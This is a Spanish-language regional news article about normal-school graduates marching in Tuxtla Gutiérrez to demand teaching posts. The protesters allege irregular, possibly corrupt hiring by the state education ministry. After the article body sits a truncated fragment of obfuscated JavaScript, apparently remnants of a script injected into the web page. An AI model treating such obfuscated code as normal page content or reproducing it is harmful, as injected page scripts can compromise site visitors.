Marchan egresados de normales, exigen plazas


Manuel Jiménez.
6 de octubre del 2025. Tuxtla Gutiérrez.- Egresados de diferentes Escuelas Normales del estado se movilizaron este lunes en Tuxtla Gutiérrez para exigir la liberación de plazas docentes.
Los manifestantes argumentaron que el proceso de contratación más reciente no se apego a los criterios establecidos en la convocatoria oficial.
El contingente, integrado por aproximadamente 50 personas, inició su recorrido en el Puente de Colores. Avanzaron por el Boulevard Belisario Domínguez hasta concentrarse frente a la sede del Gobierno del Estado, donde llevaron a cabo un mitin para explicar las razones de su protesta.
En sus declaraciones, los manifestantes afirmaron que, durante el último proceso, numerosos egresados que actualmente se encuentran frente a grupo no cumplían con los requisitos publicados en la convocatoria. Esta situación, señalaron, evidencia posibles actos de corrupción al interior de la Secretaría de Educación Estatal.
De acuerdo con los inconformes, se calcula que al menos 300 egresados normalistas resultaron afectados por estas presuntas irregularidades, lo que les impidió acceder a una plaza docente a pesar de haber cumplido con los perfiles requeridos.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Diputado reprueba detención del presidente Nicolás Maduro

Manuel Jiménez. 5 de enero del 2026. El diputado Mario Guillén Guillén, titular de la …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *